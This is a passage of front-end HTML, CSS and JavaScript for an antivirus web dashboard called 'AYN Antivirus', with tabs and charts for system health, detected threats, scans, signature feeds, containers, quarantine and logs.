.sub-tab{padding:8px 16px;cursor:pointer;color:var(--text-dim);font-size:.82rem;font-weight:600;border-bottom:2px solid transparent;transition:all .2s}
.sub-tab:hover{color:var(--text)}
.sub-tab.active{color:var(--accent);border-bottom-color:var(--accent)}
/* ── Pagination ── */
.pager{display:flex;align-items:center;justify-content:center;gap:12px;padding:12px;font-size:.84rem;color:var(--text-dim)}
/* ── Logs ── */
.log-view{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:8px;max-height:500px;overflow-y:auto;font-family:'Cascadia Code','Fira Code',monospace;font-size:.78rem;line-height:1.7}
.log-line{padding:2px 4px;display:flex;gap:10px;border-bottom:1px solid rgba(42,52,68,.4)}
.log-ts{color:var(--text-dim);min-width:140px}
.log-src{color:var(--purple);min-width:80px}
.log-msg{flex:1;word-break:break-all}
/* ── Toast ── */
.toast-area{position:fixed;top:70px;right:20px;z-index:200;display:flex;flex-direction:column;gap:8px}
.toast{padding:10px 18px;border-radius:6px;font-size:.84rem;font-weight:600;animation:slideIn .3s;box-shadow:var(--shadow)}
.toast-success{background:#065f46;color:#a7f3d0;border:1px solid var(--green)}
.toast-error{background:#7f1d1d;color:#fca5a5;border:1px solid var(--red)}
.toast-info{background:#1e3a5f;color:#93c5fd;border:1px solid var(--accent)}
@keyframes slideIn{from{opacity:0;transform:translateX(30px)}to{opacity:1;transform:none}}
</style>
</head>
<body>
<!-- HEADER -->
<div class="header">
<div class="header-left">
<div class="logo">⚔️ <span>AYN</span> ANTIVIRUS</div>
<div style="font-size:.75rem;color:var(--text-dim)">Security Dashboard</div>
</div>
<div class="header-meta">
<div><span class="pulse"></span><b id="hd-host">—</b></div>
<div>Up <b id="hd-uptime">—</b></div>
<div id="hd-time">—</div>
</div>
</div>
<!-- NAV -->
<div class="nav" id="nav">
<div class="nav-tab active" data-tab="overview">📊 Overview</div>
<div class="nav-tab" data-tab="threats">🛡️ Threats</div>
<div class="nav-tab" data-tab="scans">🔍 Scans</div>
<div class="nav-tab" data-tab="definitions">📚 Definitions</div>
<div class="nav-tab" data-tab="containers">🐳 Containers</div>
<div class="nav-tab" data-tab="quarantine">🔒 Quarantine</div>
<div class="nav-tab" data-tab="logs">📋 Logs</div>
</div>
<!-- CONTENT -->
<div class="content">
<!-- ═══════ TAB: OVERVIEW ═══════ -->
<div class="tab-panel active" id="panel-overview">
<!-- Status cards -->
<div class="section">
<div class="grid g4" id="status-cards">
<div class="card card-green"><div class="card-label">Protection</div><div class="card-value" id="ov-prot">Active</div><div class="card-sub" id="ov-prot-sub">AI-powered analysis</div></div>
<div class="card card-accent"><div class="card-label">Last Scan</div><div class="card-value" id="ov-scan">—</div><div class="card-sub" id="ov-scan-sub">—</div></div>
<div class="card card-purple"><div class="card-label">Signatures</div><div class="card-value" id="ov-sigs">—</div><div class="card-sub" id="ov-sigs-sub">—</div></div>
<div class="card"><div class="card-label">Quarantine</div><div class="card-value" id="ov-quar">0</div><div class="card-sub">Isolated items</div></div>
</div>
</div>
<!-- CPU Per-Core -->
<div class="section">
<div class="section-title"><span class="icon">🧮</span> CPU Per Core <span id="cpu-summary" style="font-size:.8rem;color:var(--text-dim);margin-left:8px"></span></div>
<div class="card" style="padding:12px">
<canvas id="cpu-canvas" height="140" style="width:100%;display:block"></canvas>
</div>
</div>
<!-- Memory Breakdown -->
<div class="section">
<div class="section-title"><span class="icon">🧠</span> Memory Usage <span id="mem-summary" style="font-size:.8rem;color:var(--text-dim);margin-left:8px"></span></div>
<div class="grid g2">
<div class="card" style="padding:12px">
<canvas id="mem-canvas" height="160" style="width:100%;display:block"></canvas>
</div>
<div class="card" style="padding:12px">
<div class="card-label">Memory Breakdown</div>
<div id="mem-bars" style="margin-top:8px"></div>
<div style="margin-top:12px;border-top:1px solid var(--border);padding-top:8px">
<div class="card-label">Swap</div>
<div id="swap-bar"></div>
</div>
</div>
</div>
</div>
<!-- Load + Network + Processes -->
<div class="section">
<div class="grid g3">
<div class="card"><div class="card-label">Load Average</div><div class="card-value" id="ov-load" style="font-size:1.2rem">—</div><div class="card-sub">1 / 5 / 15 min</div></div>
<div class="card"><div class="card-label">Network Connections</div><div class="card-value" id="ov-netconn">—</div><div class="card-sub">Active inet sockets</div></div>
<div class="card"><div class="card-label">CPU Frequency</div><div class="card-value" id="ov-freq" style="font-size:1.2rem">—</div><div class="card-sub">Current MHz</div></div>
</div>
</div>
<!-- Top Processes -->
<div class="section">
<div class="section-title"><span class="icon">⚙️</span> Top Processes</div>
<div class="tbl-wrap">
<table><thead><tr><th>PID</th><th>Process</th><th>CPU %</th><th>RAM %</th></tr></thead><tbody id="proc-tbody"><tr class="empty-row"><td colspan="4">Loading…</td></tr></tbody></table>
</div>
</div>
<!-- Disk -->
<div class="section">
<div class="section-title"><span class="icon">💾</span> Disk Usage</div>
<div class="card" id="disk-area"><div style="color:var(--text-dim);padding:8px">Loading…</div></div>
</div>
<!-- Threat summary -->
<div class="section">
<div class="section-title"><span class="icon">⚠️</span> Threat Summary</div>
<div class="grid g4">
<div class="card card-red"><div class="card-label">Critical</div><div class="card-value" id="ov-tc">0</div></div>
<div class="card card-orange"><div class="card-label">High</div><div class="card-value" id="ov-th">0</div></div>
<div class="card card-yellow"><div class="card-label">Medium</div><div class="card-value" id="ov-tm">0</div></div>
<div class="card card-green"><div class="card-label">Low</div><div class="card-value" id="ov-tl">0</div></div>
</div>
</div>
<!-- Scan Activity Chart -->
<div class="section">
<div class="section-title"><span class="icon">📈</span> Scan Activity (14 days)</div>
<div class="card" style="padding:12px">
<canvas id="scan-canvas" height="160" style="width:100%;display:block"></canvas>
<div style="display:flex;gap:16px;justify-content:center;margin-top:8px;font-size:.75rem;color:var(--text-dim)">
<span>🔵 Scans</span><span>🔴 Threats Found</span>
</div>
</div>
</div>
</div>
<!-- ═══════ TAB: THREATS ═══════ -->
<div class="tab-panel" id="panel-threats">
<div class="filters">
<select id="f-severity"><option value="">All Severities</option><option value="CRITICAL">Critical</option><option value="HIGH">High</option><option value="MEDIUM">Medium</option><option value="LOW">Low</option></select>
<select id="f-type"><option value="">All Types</option><option value="MALWARE">Malware</option><option value="MINER">Miner</option><option value="SPYWARE">Spyware</option><option value="VIRUS">Virus</option><option value="ROOTKIT">Rootkit</option></select>
<input type="text" id="f-search" placeholder="Search threats…">
</div>
<div class="tbl-wrap">
<table><thead><tr><th>Time</th><th>File Path</th><th>Threat</th><th>Type</th><th>Severity</th><th>Detector</th><th>AI Verdict</th><th>Status</th><th>Actions</th></tr></thead><tbody id="threat-tbody"><tr class="empty-row"><td colspan="9">Loading…</td></tr></tbody></table>
</div>
<div class="pager"><button class="btn btn-sm" id="threat-prev">← Prev</button><span id="threat-page">Page 1</span><button class="btn btn-sm" id="threat-next">Next →</button></div>
</div>
<!-- ═══════ TAB: SCANS ═══════ -->
<div class="tab-panel" id="panel-scans">
<div class="btn-row">
<button class="btn btn-primary" id="btn-quick-scan" onclick="doAction('quick-scan',this)">⚡ Run Quick Scan</button>
<button class="btn" id="btn-full-scan" onclick="doAction('full-scan',this)">🔍 Run Full Scan</button>
</div>
<div class="section">
<div class="section-title"><span class="icon">📈</span> Scan History (30 days)</div>
<div class="card" style="padding:12px"><canvas id="scan-chart-canvas" height="160" style="width:100%;display:block"></canvas><div style="display:flex;gap:16px;justify-content:center;margin-top:8px;font-size:.75rem;color:var(--text-dim)"><span>🔵 Scans</span><span>🔴 Threats</span></div></div>
</div>
<div class="section">
<div class="section-title"><span class="icon">📋</span> Recent Scans</div>
<div class="tbl-wrap">
<table><thead><tr><th>Time</th><th>Type</th><th>Path</th><th>Files</th><th>Threats</th><th>Duration</th><th>Status</th></tr></thead><tbody id="scan-tbody"><tr class="empty-row"><td colspan="7">Loading…</td></tr></tbody></table>
</div>
</div>
</div>
<!-- ═══════ TAB: DEFINITIONS ═══════ -->
<div class="tab-panel" id="panel-definitions">
<div class="grid g4 section">
<div class="card card-purple"><div class="card-label">Hashes</div><div class="card-value" id="def-hashes">0</div></div>
<div class="card card-accent"><div class="card-label">Malicious IPs</div><div class="card-value" id="def-ips">0</div></div>
<div class="card card-orange"><div class="card-label">Domains</div><div class="card-value" id="def-domains">0</div></div>
<div class="card card-red"><div class="card-label">URLs</div><div class="card-value" id="def-urls">0</div></div>
</div>
<div class="btn-row">
<button class="btn btn-primary" onclick="doAction('update-sigs',this)">🔄 Update All Feeds</button>
<button class="btn btn-sm" onclick="doFeedUpdate('malwarebazaar',this)">MalwareBazaar</button>
<button class="btn btn-sm" onclick="doFeedUpdate('threatfox',this)">ThreatFox</button>
<button class="btn btn-sm" onclick="doFeedUpdate('urlhaus',this)">URLhaus</button>
<button class="btn btn-sm" onclick="doFeedUpdate('feodotracker',this)">FeodoTracker</button>
<button class="btn btn-sm" onclick="doFeedUpdate('emergingthreats',this)">EmergingThreats</button>
</div>
<div class="sub-tabs" id="def-subtabs">
<div class="sub-tab active" data-def="all">All</div>
<div class="sub-tab" data-def="hash">Hashes</div>
<div class="sub-tab" data-def="ip">IPs</div>
<div class="sub-tab" data-def="domain">Domains</div>
<div class="sub-tab" data-def="url">URLs</div>
</div>
<div class="filters"><input type="text" id="def-search" placeholder="Search definitions…" style="flex:1;max-width:400px"></div>
<div class="tbl-wrap"><table><thead id="def-thead"></thead><tbody id="def-tbody"><tr class="empty-row"><td colspan="6">Loading…</td></tr></tbody></table></div>
<div class="pager"><button class="btn btn-sm" id="def-prev" onclick="defPage(-1)">← Prev</button><span id="def-page-info">Page 1</span><button class="btn btn-sm" id="def-next" onclick="defPage(1)">Next →</button></div>
<div class="section" style="margin-top:20px">
<div class="section-title"><span class="icon">🔄</span> Recent Updates</div>
<div class="tbl-wrap"><table><thead><tr><th>Time</th><th>Feed</th><th>Hashes</th><th>IPs</th><th>Domains</th><th>URLs</th><th>Status</th></tr></thead><tbody id="sigup-tbody"></tbody></table></div>
</div>
</div>
<!-- ═══════ TAB: CONTAINERS ═══════ -->
<div class="tab-panel" id="panel-containers">
<div class="btn-row">
<button class="btn btn-primary" id="btn-scan-containers" onclick="doAction('scan-containers',this)">🐳 Scan All Containers</button>
</div>
<div class="grid g3 section">
<div class="card card-accent"><div class="card-label">Containers Found</div><div class="card-value" id="ct-count">0</div></div>
<div class="card card-green"><div class="card-label">Available Runtimes</div><div class="card-value" id="ct-runtimes" style="font-size:1rem">—</div></div>
<div class="card card-red"><div class="card-label">Container Threats</div><div class="card-value" id="ct-threats">0</div></div>
</div>
<div class="section">
<div class="section-title"><span class="icon">📦</span> Discovered Containers</div>
<div class="tbl-wrap">
<table><thead><tr><th>ID</th><th>Name</th><th>Image</th><th>Runtime</th><th>Status</th><th>IP</th><th>Ports</th><th>Action</th></tr></thead>
<tbody id="ct-tbody"><tr class="empty-row"><td colspan="8">Loading…</td></tr></tbody></table>
</div>
</div>
<div class="section">
<div class="section-title"><span class="icon">⚠️</span> Container Threats</div>
<div class="tbl-wrap">
<table><thead><tr><th>Time</th><th>Container</th><th>Threat</th><th>Type</th><th>Severity</th><th>Details</th></tr></thead>
<tbody id="ct-threat-tbody"><tr class="empty-row"><td colspan="6">No container threats ✅</td></tr></tbody></table>
</div>
</div>
</div>
<!-- ═══════ TAB: QUARANTINE ═══════ -->
<div class="tab-panel" id="panel-quarantine">
<div class="grid g2 section">
<div class="card"><div class="card-label">Total Quarantined</div><div class="card-value" id="q-count">0</div></div>
<div class="card"><div class="card-label">Vault Size</div><div class="card-value" id="q-size">0 B</div></div>
</div>
<div class="tbl-wrap"><table><thead><tr><th>ID</th><th>Original Path</th><th>Threat</th><th>Date</th><th>Size</th></tr></thead><tbody id="quar-tbody"><tr class="empty-row"><td colspan="5">Vault is empty ✅</td></tr></tbody></table></div>
</div>
<!-- ═══════ TAB: LOGS ═══════ -->
<div class="tab-panel" id="panel-logs">
<div class="btn-row"><button class="btn btn-sm" onclick="loadLogs()">🔄 Refresh</button></div>
<div class="log-view" id="log-view"><div style="color:var(--text-dim)">Loading…</div></div>
</div>
</div><!-- /content -->
<!-- Toast area -->
<div class="toast-area" id="toast-area"></div>
<script>
/* ── State ── */
let S={threats:[],threatPage:1,threatPerPage:25,defType:'all',defPage:1,defPerPage:50,defSearch:''};
const $=id=>document.getElementById(id);
const Q=(s,el)=>(el||document).querySelectorAll(s);
/* ── Helpers ── */
function fmt(n){return n==null?'':Number(n).toLocaleString()}
function fmtBytes(b){if(!b)return '0 B';const u=['B','KB','MB','GB','TB'];let i=0;let v=b;while(v>=1024&&i<u.length-1){v/=1024;i++;}return v.toFixed(i?1:0)+' '+u[i];}
function fmtDur(s){if(!s||s<0)return '0s';s=Math.round(s);if(s<60)return s+'s';if(s<3600)return Math.floor(s/60)+'m '+s%60+'s';return Math.floor(s/3600)+'h '+Math.floor(s%3600/60)+'m';}
function ago(ts){if(!ts)return '';const d=new Date(ts+'Z');const s=Math.floor((Date.now()-d)/1000);if(s<60)return s+'s ago';if(s<3600)return Math.floor(s/60)+'m ago';if(s<86400)return Math.floor(s/3600)+'h ago';return Math.floor(s/86400)+'d ago';}
function sevBadge(s){const c=esc((s||'').toUpperCase());const cl=c.toLowerCase().replace(/[^a-z]/g,'');return `<span class="badge badge-${cl}">${c}</span>`;}
function statusBadge(s){const m={completed:'success',success:'success',running:'running',failed:'error',error:'error'};const safe=esc(s||'');const cl=(m[s]||'info').replace(/[^a-z]/g,'');return `<span class="badge badge-${cl}">${safe}</span>`;}
function esc(s){const d=document.createElement('div');d.textContent=s||'';return d.innerHTML;}
function trunc(s,n){s=s||'';return s.length>n?s.slice(0,n)+'':s;}
function setGauge(id,pct,color){const g=$(id);if(!g)return;const c=g.querySelector('.gauge-fill');const t=g.querySelector('.gauge-text');const off=314-(314*Math.min(pct,100)/100);c.style.strokeDashoffset=off;if(color)c.style.stroke=color;t.textContent=Math.round(pct)+'%';}
function gaugeColor(p){return p>90?'var(--red)':p>70?'var(--orange)':p>50?'var(--yellow)':'var(--green)';}
/* ── Toast ── */
function toast(msg,type='info'){const t=document.createElement('div');t.className='toast toast-'+type;t.textContent=msg;$('toast-area').appendChild(t);setTimeout(()=>t.remove(),4000);}
/* ── API ── */
async function api(path){try{const r=await fetch(path);if(!r.ok)throw new Error(r.statusText);return await r.json();}catch(e){console.error('API error:',path,e);return null;}}
/* ── Tab switching ── */
Q('.nav-tab').forEach(t=>t.addEventListener('click',()=>{
Q('.nav-tab').forEach(x=>x.classList.remove('active'));
Q('.tab-panel').forEach(x=>x.classList.remove('active'));
t.classList.add('active');
$('panel-'+t.dataset.tab).classList.add('active');
if(t.dataset.tab==='threats')loadThreats();
if(t.dataset.tab==='scans')loadScans();
if(t.dataset.tab==='definitions')loadDefs();
if(t.dataset.tab==='containers')loadContainers();
if(t.dataset.tab==='quarantine')loadQuarantine();
if(t.dataset.tab==='logs')loadLogs();
}));
/* ═══════ OVERVIEW ═══════ */
/* ── Canvas Chart Helpers ── */
let _cpuHistory=[];const _CPU_HIST_MAX=60;
let _memHistory=[];const _MEM_HIST_MAX=60;
function drawLineChart(canvasId,datasets,opts={}){
const cv=$(canvasId);if(!cv)return;
const dpr=window.devicePixelRatio||1;
const rect=cv.getBoundingClientRect();
cv.width=rect.width*dpr;cv.height=(opts.height||rect.height)*dpr;
const ctx=cv.getContext('2d');ctx.scale(dpr,dpr);
const W=rect.width,H=opts.height||rect.height;
const pad={t:10,r:10,b:24,l:42};
const cw=W-pad.l-pad.r,ch=H-pad.t-pad.b;
// Background
ctx.fillStyle='#0d1117';ctx.fillRect(0,0,W,H);
// Grid
const gridLines=opts.gridLines||5;
const maxVal=opts.maxVal||Math.max(...datasets.flatMap(d=>d.data),1);
ctx.strokeStyle='#1e293b';ctx.lineWidth=1;ctx.font='10px system-ui';ctx.fillStyle='#6b7280';
for(let i=0;i<=gridLines;i++){
const y=pad.t+ch-(ch*i/gridLines);
ctx.beginPath();ctx.moveTo(pad.l,y);ctx.lineTo(pad.l+cw,y);ctx.stroke();
const v=((maxVal*i/gridLines)).toFixed(opts.decimals||0);
ctx.fillText(v+(opts.unit||''),2,y+3);
}
// Data lines
datasets.forEach(ds=>{
if(!ds.data.length)return;
const n=ds.data.length;
ctx.beginPath();ctx.strokeStyle=ds.color;ctx.lineWidth=ds.lineWidth||2;
ds.data.forEach((v,i)=>{
const x=pad.l+(cw*i/(n-1||1));
const y=pad.t+ch-ch*(Math.min(v,maxVal)/maxVal);
if(i===0)ctx.moveTo(x,y);else ctx.lineTo(x,y);
});
ctx.stroke();
// Fill
if(ds.fill){
const n2=ds.data.length;
ctx.lineTo(pad.l+cw,pad.t+ch);ctx.lineTo(pad.l,pad.t+ch);ctx.closePath();
ctx.fillStyle=ds.fill;ctx.fill();
}
});
// Labels
if(opts.labels&&opts.labels.length){
ctx.fillStyle='#6b7280';ctx.font='9px system-ui';ctx.textAlign='center';
const n=opts.labels.length;
opts.labels.forEach((l,i)=>{
if(i%Math.ceil(n/8)!==0&&i!==n-1)return;
const x=pad.l+(cw*i/(n-1||1));
ctx.fillText(l,x,H-2);
});
}
}
function drawBarChart(canvasId,data,opts={}){
const cv=$(canvasId);if(!cv||!data.length)return;
const dpr=window.devicePixelRatio||1;
const rect=cv.getBoundingClientRect();
cv.width=rect.width*dpr;cv.height=(opts.height||rect.height)*dpr;
const ctx=cv.getContext('2d');ctx.scale(dpr,dpr);
const W=rect.width,H=opts.height||rect.height;
const pad={t:10,r:10,b:28,l:42};
const cw=W-pad.l-pad.r,ch=H-pad.t-pad.b;
ctx.fillStyle='#0d1117';ctx.fillRect(0,0,W,H);
const maxVal=opts.maxVal||Math.max(...data.flatMap(d=>[(d.scans||0),(d.threats||0)]),1);
// Grid
ctx.strokeStyle='#1e293b';ctx.lineWidth=1;ctx.font='10px system-ui';ctx.fillStyle='#6b7280';
for(let i=0;i<=4;i++){
const y=pad.t+ch-(ch*i/4);
ctx.beginPath();ctx.moveTo(pad.l,y);ctx.lineTo(pad.l+cw,y);ctx.stroke();
ctx.fillText(Math.round(maxVal*i/4),2,y+3);
}
const n=data.length;const bw=Math.max((cw/n)*0.35,2);const gap=cw/n;
data.forEach((d,i)=>{
const x=pad.l+gap*i+gap*0.15;
const sh=ch*(d.scans||0)/maxVal;
const th=ch*(d.threats||0)/maxVal;
// Scans bar
ctx.fillStyle='#3b82f6';ctx.fillRect(x,pad.t+ch-sh,bw,sh);
// Threats bar
ctx.fillStyle='#ef4444';ctx.fillRect(x+bw+1,pad.t+ch-th,bw,th);
// Label
ctx.fillStyle='#6b7280';ctx.font='9px system-ui';ctx.textAlign='center';
const day=(d.day||'').slice(5);
ctx.fillText(day,x+bw,H-4);
});
}
function drawCoreChart(canvasId,cores){
const cv=$(canvasId);if(!cv||!cores.length)return;
const dpr=window.devicePixelRatio||1;
const rect=cv.getBoundingClientRect();
cv.width=rect.width*dpr;cv.height=140*dpr;
const ctx=cv.getContext('2d');ctx.scale(dpr,dpr);
const W=rect.width,H=140;
const pad={t:8,r:8,b:20,l:8};
const n=cores.length;const gap=4;
const bw=Math.min((W-pad.l-pad.r-(n-1)*gap)/n,60);
ctx.fillStyle='#0d1117';ctx.fillRect(0,0,W,H);
cores.forEach((pct,i)=>{
const x=pad.l+i*(bw+gap);
const barH=(H-pad.t-pad.b)*(pct/100);
const c=pct>90?'#ef4444':pct>70?'#f59e0b':pct>50?'#eab308':'#3b82f6';
// Background
ctx.fillStyle='#1e293b';ctx.fillRect(x,pad.t,bw,H-pad.t-pad.b);
// Bar
ctx.fillStyle=c;ctx.fillRect(x,H-pad.b-barH,bw,barH);
// Label
ctx.fillStyle='#e2e8f0';ctx.font='bold 10px system-ui';ctx.textAlign='center';
ctx.fillText(Math.round(pct)+'%',x+bw/2,H-pad.b-barH-4>pad.t?H-pad.b-barH-4:pad.t+12);
ctx.fillStyle='#6b7280';ctx.font='9px system-ui';
ctx.fillText('C'+i,x+bw/2,H-4);
});
}
function renderMemBars(h){
const total=h.mem_total||1;
const used=h.mem_used||0;
const cached=h.mem_cached||0;
const buffers=h.mem_buffers||0;
const avail=h.mem_available||0;
const app=used-cached-buffers;
const items=[
{label:'App/Used',val:Math.max(app,0),color:'var(--purple)'},
{label:'Cached',val:cached,color:'var(--cyan)'},
{label:'Buffers',val:buffers,color:'var(--accent)'},
{label:'Available',val:avail,color:'var(--green)'},
];
$('mem-bars').innerHTML=items.map(it=>{
const pct=(it.val/total*100).toFixed(1);
return `<div class="disk-row"><div class="disk-mount" style="width:70px"><span style="display:inline-block;width:8px;height:8px;border-radius:50%;background:${it.color};margin-right:4px"></span>${it.label}</div><div class="disk-bar-outer"><div class="disk-bar-inner" style="width:${pct}%;background:${it.color}"></div></div><div class="disk-pct">${fmtBytes(it.val)}</div></div>`;
}).join('');
// Swap
const spct=h.swap_total?(h.swap_used/h.swap_total*100).toFixed(1):0;
$('swap-bar').innerHTML=h.swap_total?`<div class="disk-row"><div class="disk-mount" style="width:70px">${fmtBytes(h.swap_used)}/${fmtBytes(h.swap_total)}</div><div class="disk-bar-outer"><div class="disk-bar-inner" style="width:${spct}%;background:var(--orange)"></div></div><div class="disk-pct">${spct}%</div></div>`:'<div style="color:var(--text-dim);font-size:.8rem">No swap</div>';
}
async function loadOverview(){
const [st,h,ts,ch]=await Promise.all([api('/api/status'),api('/api/health'),api('/api/threat-stats'),api('/api/scan-chart?days=14')]);
if(st){
$('hd-host').textContent=st.hostname||'';
$('hd-uptime').textContent=fmtDur(st.uptime_seconds);
$('hd-time').textContent=st.server_time||'';
const ls=st.last_scan;
$('ov-scan').textContent=ls?ago(ls.timestamp):'Never';
$('ov-scan-sub').textContent=ls?`${fmt(ls.files_scanned)} files, ${ls.threats_found} threats`:'No scans yet';
const sig=st.signatures||{};
$('ov-sigs').textContent=fmt((sig.total_hashes||0)+(sig.total_ips||0)+(sig.total_domains||0)+(sig.total_urls||0));
$('ov-sigs-sub').textContent=sig.last_update?'Updated '+ago(sig.last_update):'Not updated';
$('ov-quar').textContent=fmt(st.quarantine_count);
}
if(h){
// CPU per-core chart
const cores=h.cpu_per_core||[];
if(cores.length){
drawCoreChart('cpu-canvas',cores);
$('cpu-summary').textContent=`${cores.length} cores @ ${h.cpu_freq_mhz||'?'} MHz — avg ${Math.round(h.cpu_percent)}%`;
}
// CPU history
_cpuHistory.push(h.cpu_percent||0);if(_cpuHistory.length>_CPU_HIST_MAX)_cpuHistory.shift();
// Memory
_memHistory.push(h.mem_percent||0);if(_memHistory.length>_MEM_HIST_MAX)_memHistory.shift();
drawLineChart('mem-canvas',[
{data:_memHistory,color:'#8b5cf6',fill:'rgba(139,92,246,0.1)',lineWidth:2},
],{maxVal:100,unit:'%',height:160,gridLines:4});
$('mem-summary').textContent=`${fmtBytes(h.mem_used)} / ${fmtBytes(h.mem_total)} (${h.mem_percent?.toFixed(1)}%)`;
renderMemBars(h);
// Load / Net / Freq
const la=h.load_avg||[0,0,0];
$('ov-load').textContent=la.map(v=>v.toFixed(2)).join(' / ');
$('ov-netconn').textContent=fmt(h.net_connections||0);
$('ov-freq').textContent=h.cpu_freq_mhz?h.cpu_freq_mhz+' MHz':'';
// Top processes
const procs=h.top_processes||[];
const ptb=$('proc-tbody');
if(procs.length){
ptb.innerHTML=procs.map(p=>{
const cpuC=p.cpu>50?'var(--red)':p.cpu>20?'var(--orange)':'var(--text)';
return `<tr><td class="mono">${p.pid}</td><td>${esc(p.name)}</td><td style="color:${cpuC};font-weight:600">${p.cpu}%</td><td>${p.mem}%</td></tr>`;
}).join('');
}else{ptb.innerHTML='<tr class="empty-row"><td colspan="4">No active processes</td></tr>';}
// Disks
const da=$('disk-area');
const disks=h.disk_usage||[];
if(disks.length){
da.innerHTML=disks.map(d=>{
const p=d.percent||0;const c=p>90?'var(--red)':p>70?'var(--orange)':'var(--accent)';
return `<div class="disk-row"><div class="disk-mount" title="${esc(d.mount)}">${esc(d.mount)}</div><div class="disk-bar-outer"><div class="disk-bar-inner" style="width:${p}%;background:${c}"></div></div><div class="disk-pct">${p.toFixed(1)}%</div><div style="font-size:.75rem;color:var(--text-dim);min-width:100px">${fmtBytes(d.used)} / ${fmtBytes(d.total)}</div></div>`;
}).join('');
}else{da.innerHTML='<div style="color:var(--text-dim);padding:8px">No disk info</div>';}
}
if(ts){
const bs=ts.by_severity||{};
$('ov-tc').textContent=fmt(bs.CRITICAL||0);
$('ov-th').textContent=fmt(bs.HIGH||0);
$('ov-tm').textContent=fmt(bs.MEDIUM||0);
$('ov-tl').textContent=fmt(bs.LOW||0);
}
if(ch&&ch.chart&&ch.chart.length){
drawBarChart('scan-canvas',ch.chart.slice(-14),{height:160});
}
}
/* ═══════ THREATS ═══════ */
async function loadThreats(){
const d=await api(`/api/threats?limit=200`);
if(!d)return;
S.threats=d.threats||[];
renderThreats();
}
function renderThreats(){
const sev=$('f-severity').value.toUpperCase();
const typ=$('f-type').value.toUpperCase();
const q=$('f-search').value.toLowerCase();
let f=S.threats;
if(sev)f=f.filter(t=>(t.severity||'').toUpperCase()===sev);
if(typ)f=f.filter(t=>(t.threat_type||'').toUpperCase()===typ);
if(q)f=f.filter(t=>(t.threat_name||'').toLowerCase().includes(q)||(t.file_path||'').toLowerCase().includes(q));
const total=f.length;const pages=Math.max(Math.ceil(total/S.threatPerPage),1);
S.threatPage=Math.min(S.threatPage,pages);
const start=(S.threatPage-1)*S.threatPerPage;
const slice=f.slice(start,start+S.threatPerPage);
const tb=$('threat-tbody');
if(!slice.length){tb.innerHTML='<tr class="empty-row"><td colspan="9">No threats detected ✅</td></tr>';
}else{tb.innerHTML=slice.map(t=>{
const act=t.action_taken||'detected';
const st=act==='detected'?'<span class="badge badge-warning">detected</span>':act==='quarantined'?'<span class="badge badge-info">quarantined</span>':statusBadge(act);
let btns='';
if(act==='detected'||act==='monitoring'){
btns=`<div style="display:flex;gap:4px;flex-wrap:wrap"><button class="btn btn-sm" style="background:var(--purple);color:#fff;border-color:var(--purple);font-size:.7rem;padding:3px 8px" onclick="aiAnalyze(${t.id},this)">🧠 AI Analyze</button><button class="btn btn-sm" style="background:var(--red);color:#fff;border-color:var(--red);font-size:.7rem;padding:3px 8px" onclick="threatAction('quarantine',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','${esc(t.threat_name).replace(/'/g,"\\'")}',this)">🔒 Quarantine</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('delete-threat',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','',this)">🗑️ Delete</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('whitelist',${t.id},'','',this)">✅ Ignore</button></div>`;
} else if(act==='quarantined'){
btns=`<div style="display:flex;gap:4px;flex-wrap:wrap"><button class="btn btn-sm" style="background:var(--purple);color:#fff;border-color:var(--purple);font-size:.7rem;padding:3px 8px" onclick="aiAnalyze(${t.id},this)">🧠 AI Analyze</button><button class="btn btn-sm" style="background:var(--green);color:#fff;border-color:var(--green);font-size:.7rem;padding:3px 8px" onclick="threatAction('restore',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','',this)">♻️ Restore</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('delete-threat',${t.id},'${esc(t.file_path).replace(/'/g,"\\'")}','',this)">🗑️ Delete</button><button class="btn btn-sm" style="font-size:.7rem;padding:3px 8px" onclick="threatAction('whitelist',${t.id},'','',this)">✅ Ignore</button></div>`;
} else {
btns=`<span style="color:var(--text-dim);font-size:.75rem">${esc(act)}</span>`;
}
const det=t.details||'';
let aiCol='<span style="color:var(--text-dim);font-size:.75rem">—</span>';
const aiMatch=det.match(/\[AI:\s*(\w+)\s+(\d+)%\]\s*(.*)/);
if(aiMatch){const v=aiMatch[1],c=aiMatch[2],rsn=aiMatch[3];const vc=v==='safe'?'var(--green)':v==='threat'?'var(--red)':'var(--orange)';aiCol=`<div style="font-size:.75rem"><span style="color:${vc};font-weight:700">${v.toUpperCase()}</span> <span style="color:var(--text-dim)">${c}%</span><div style="color:var(--text-dim);max-width:150px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap" title="${esc(rsn)}">${esc(rsn)}</div></div>`;}
return `<tr><td>${ago(t.timestamp)}</td><td class="mono trunc" title="${esc(t.file_path)}">${esc(trunc(t.file_path,50))}</td><td>${esc(t.threat_name)}</td><td>${esc(t.threat_type)}</td><td>${sevBadge(t.severity)}</td><td>${esc(t.detector)}</td><td>${aiCol}</td><td>${st}</td><td>${btns}</td></tr>`;
}).join('');}
$('threat-page').textContent=`Page ${S.threatPage} of ${pages} (${total})`;
}
$('threat-prev').onclick=()=>{S.threatPage=Math.max(1,S.threatPage-1);renderThreats();};
$('threat-next').onclick=()=>{S.threatPage++;renderThreats();};
$('f-severity').onchange=$('f-type').onchange=()=>{S.threatPage=1;renderThreats();};
let _tTimer;$('f-search').oninput=()=>{clearTimeout(_tTimer);_tTimer=setTimeout(()=>{S.threatPage=1;renderThreats();},300);};
/* ═══════ SCANS ═══════ */
async function loadScans(){
const [sc,ch]=await Promise.all([api('/api/scans?limit=30'),api('/api/scan-chart?days=30')]);
if(sc){
const tb=$('scan-tbody');
const scans=sc.scans||[];
if(!scans.length){tb.innerHTML='<tr class="empty-row"><td colspan="7">No scans yet</td></tr>';
}else{tb.innerHTML=scans.map(s=>`<tr><td>${ago(s.timestamp)}</td><td>${esc(s.scan_type)}</td><td class="mono trunc" title="${esc(s.scan_path)}">${esc(trunc(s.scan_path,40))}</td><td>${fmt(s.files_scanned)}</td><td>${s.threats_found?'<span style="color:var(--red)">'+s.threats_found+'</span>':'0'}</td><td>${fmtDur(s.duration_seconds)}</td><td>${statusBadge(s.status)}</td></tr>`).join('');}
}
